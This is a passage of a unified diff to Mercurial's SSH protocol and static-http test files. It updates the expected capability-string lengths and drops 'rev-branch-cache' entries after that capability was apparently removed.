$USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1715,8 +1715,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> 
read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1788,8 +1788,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1843,8 +1843,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1918,8 +1918,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1977,8 +1977,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known 
lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command diff --git a/tests/test-ssh-proto.t b/tests/test-ssh-proto.t --- a/tests/test-ssh-proto.t +++ b/tests/test-ssh-proto.t @@ -64,7 +64,7 @@ devel-peer-request: pairs: 81 bytes sending hello command sending between command - remote: 463 + remote: 444 remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash remote: 1 devel-peer-request: protocaps @@ -86,8 +86,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n `hg debugserve --sshstdio` works @@ -96,7 +96,7 @@ $ hg debugserve --sshstdio << EOF > hello > EOF - 463 + 444 capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash I/O logging works @@ -106,24 +106,24 @@ > EOF e> flush() -> None o> write(4) -> 4: - o> 463\n - o> write(463) -> 463: + o> 444\n + o> write(444) -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n - 463 + 444 capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known 
lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> flush() -> None $ hg debugserve --sshstdio --logiofile $TESTTMP/io << EOF > hello > EOF - 463 + 444 capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash $ cat $TESTTMP/io e> flush() -> None o> write(4) -> 4: - o> 463\n - o> write(463) -> 463: + o> 444\n + o> write(444) -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> flush() -> None @@ -149,8 +149,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -187,7 +187,7 @@ remote: banner: line 7 remote: banner: line 8 remote: banner: line 9 - remote: 463 + remote: 444 remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash remote: 1 devel-peer-request: protocaps @@ -245,8 +245,8 @@ o> readline() -> 15: o> banner: line 9\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -297,12 +297,12 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n + o> 444\n i> write(98) 
-> 98: i> between\n i> pairs 81\n i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 - o> readline() -> 463: + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -316,7 +316,7 @@ sending hello command sending between command remote: 0 - remote: 463 + remote: 444 remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash remote: 1 devel-peer-request: protocaps @@ -365,8 +365,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -390,7 +390,7 @@ remote: 0 remote: 0 remote: 0 - remote: 463 + remote: 444 remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash remote: 1 devel-peer-request: protocaps @@ -447,8 +447,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -494,8 +494,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap 
$USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -539,8 +539,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -609,8 +609,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n Incomplete dictionary send @@ -691,8 +691,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -725,8 +725,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -768,8 +768,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog 
unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -797,8 +797,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(105) -> 105: i> between\n @@ -838,8 +838,8 @@ i> pairs 81\n i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -887,8 +887,8 @@ o> readline() -> 41: o> 68986213bd4485ea51533535e3fc9e78007a711f\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -914,7 +914,7 @@ o> readline() -> 41: o> 68986213bd4485ea51533535e3fc9e78007a711f\n o> readline() -> 4: - o> 463\n + o> 444\n Send an upgrade request to a server that doesn't support that command @@ -943,8 +943,8 @@ i> pairs 81\n i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -962,7 +962,7 @@ sending hello command sending 
between command remote: 0 - remote: 463 + remote: 444 remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash remote: 1 devel-peer-request: protocaps @@ -1005,8 +1005,8 @@ o> readline() -> 44: o> upgraded this-is-some-token exp-ssh-v2-0003\n o> readline() -> 4: - o> 462\n - o> readline() -> 463: + o> 443\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n $ cd .. @@ -1081,7 +1081,6 @@ remote-changegroup http https - rev-branch-cache stream v2 @@ -1114,14 +1113,14 @@ o> readline() -> 44: o> upgraded this-is-some-token exp-ssh-v2-0003\n o> readline() -> 4: - o> 462\n - o> readline() -> 463: + o> 443\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 447\n - o> readline() -> 447: + o> 428\n + o> readline() -> 428: o> capabilities: branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n Multiple upgrades is not allowed @@ -1152,8 +1151,8 @@ o> readline() -> 44: o> upgraded this-is-some-token exp-ssh-v2-0003\n o> readline() -> 4: - o> 462\n - o> readline() -> 463: + o> 443\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(45) -> 45: i> upgrade another-token proto=irrelevant\n @@ -1224,8 +1223,8 @@ i> write(6) -> 6: i> 
hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -1343,8 +1342,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1381,8 +1380,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1431,8 +1430,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1461,8 +1460,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: 
batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1492,8 +1491,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1525,8 +1524,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1559,8 +1558,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1595,8 +1594,8 @@ 
o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1634,8 +1633,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1674,8 +1673,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending pushkey command @@ -1726,8 +1725,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey 
streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1759,8 +1758,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1809,8 +1808,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1847,8 +1846,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1886,8 +1885,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> 
readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1922,8 +1921,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1959,8 +1958,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1992,8 +1991,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -2030,8 +2029,8 @@ i> 
0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -2071,8 +2070,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending pushkey command @@ -2137,8 +2136,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -2177,8 +2176,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey 
streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending batch with 3 sub-commands diff --git a/tests/test-ssh.t b/tests/test-ssh.t --- a/tests/test-ssh.t +++ b/tests/test-ssh.t @@ -518,7 +518,7 @@ devel-peer-request: pairs: 81 bytes sending hello command sending between command - remote: 463 (sshv1 !) + remote: 444 (sshv1 !) protocol upgraded to exp-ssh-v2-0003 (sshv2 !) remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash remote: 1 (sshv1 !) @@ -537,7 +537,7 @@ no changes found devel-peer-request: getbundle devel-peer-request: bookmarks: 1 bytes - devel-peer-request: bundlecaps: 289 bytes + devel-peer-request: bundlecaps: 270 bytes devel-peer-request: cg: 1 bytes devel-peer-request: common: 122 bytes devel-peer-request: heads: 122 bytes diff --git a/tests/test-static-http.t b/tests/test-static-http.t --- a/tests/test-static-http.t +++ b/tests/test-static-http.t @@ -231,8 +231,6 @@ /.hg/bookmarks /.hg/bookmarks.current /.hg/cache/hgtagsfnodes1 - /.hg/cache/rbc-names-v1 - /.hg/cache/rbc-revs-v1 /.hg/dirstate /.hg/requires /.hg/store/00changelog.i @@ -248,8 +246,6 @@ 